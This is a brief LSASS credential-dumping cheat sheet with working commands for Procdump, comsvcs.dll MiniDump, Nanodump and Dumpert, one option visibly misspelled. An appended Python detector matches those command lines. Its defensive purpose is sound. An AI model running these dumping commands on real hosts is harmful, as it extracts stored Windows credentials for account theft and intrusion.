LSASS Dumping

LSASS - Techniques

  • Task Manager

  • Procdump

  • System Informer

  • Comsvcs.dll

  • Nanodump

  • Dumpert

Lsass Dump: Task Manager

Lsass Dump: Procdump

procdump.exe -accepteula -ma lsass.exe lsadump.dmp

Lsass Dump: System Informer

Lsass Dump: Comsvcs.dll

./PsExec -i -d -s cmd.exe
C:\Windows\System32\comsvcs.dll, MiniDump 688 C:\Users\<user>\Documente\cred_tools\lsass_dump\dmp\lsass.dmp full

Lsass Dump: Nanodump

./nanodump.x64.exe --write normal_lsass.dmp
./nanodump.x64.exe --silen-process-exit .\wer_lsas

Lsass Dump: Dumpert

Outflank-Dumpert.exe
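Detection view of the commands above, as an added example that is not part of the original page: a small matcher that flags process command lines shaped like the Procdump, Comsvcs.dll, Nanodump and Dumpert invocations listed here. The rule names, function names and sample event lines are constructed for illustration; the input is assumed to be the command-line field of process-creation events.

```python
import re

# Each rule pairs a name with a regex applied to one process command line
# (assumed to come from the command-line field of a process-creation event).
RULES = [
    # procdump.exe -accepteula -ma lsass.exe lsadump.dmp
    ("procdump_full_dump_of_lsass",
     re.compile(r"^(?=.*\s[-/]ma\s)(?=.*\blsass(\.exe)?(\s|$))", re.I)),
    # comsvcs.dll, MiniDump <pid> <path> full
    ("comsvcs_minidump_export",
     re.compile(r"comsvcs\.dll\s*,\s*MiniDump\s+\d+\s+\S+\s+full\b", re.I)),
    # nanodump --write <file>, or the process-exit option as spelled on this page
    ("nanodump_invocation",
     re.compile(r"nanodump\S*\s+--(write|silen\w*-process-exit)\s+\S+", re.I)),
    # Outflank-Dumpert.exe is run without arguments, so only the image name is left
    ("dumpert_image_name",
     re.compile(r"\bOutflank-Dumpert(\.exe)?\b", re.I)),
]

# Constructed sample events: four shaped like the page's commands, two benign.
SAMPLE_EVENTS = [
    r"procdump.exe -accepteula -ma lsass.exe lsadump.dmp",
    r"C:\Windows\System32\comsvcs.dll, MiniDump 688 C:\Temp\lsass.dmp full",
    r"nanodump.x64.exe --write normal_lsass.dmp",
    r"Outflank-Dumpert.exe",
    r"procdump.exe -accepteula -ma notepad.exe notepad.dmp",
    r"rundll32.exe shell32.dll,Control_RunDLL desk.cpl",
]


def match_rules(command_line):
    """Return the names of all rules that match one command line."""
    return [name for name, rx in RULES if rx.search(command_line)]


def scan(events):
    """Return (command_line, rule_names) for every event with at least one hit."""
    hits = []
    for command_line in events:
        names = match_rules(command_line)
        if names:
            hits.append((command_line, names))
    return hits


if __name__ == "__main__":
    for command_line, names in scan(SAMPLE_EVENTS):
        print(", ".join(names), "<-", command_line)
```

Task Manager and System Informer dumps are made from a GUI and leave no distinctive command line, so they need a different signal, such as process-access events where the target is lsass.exe.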
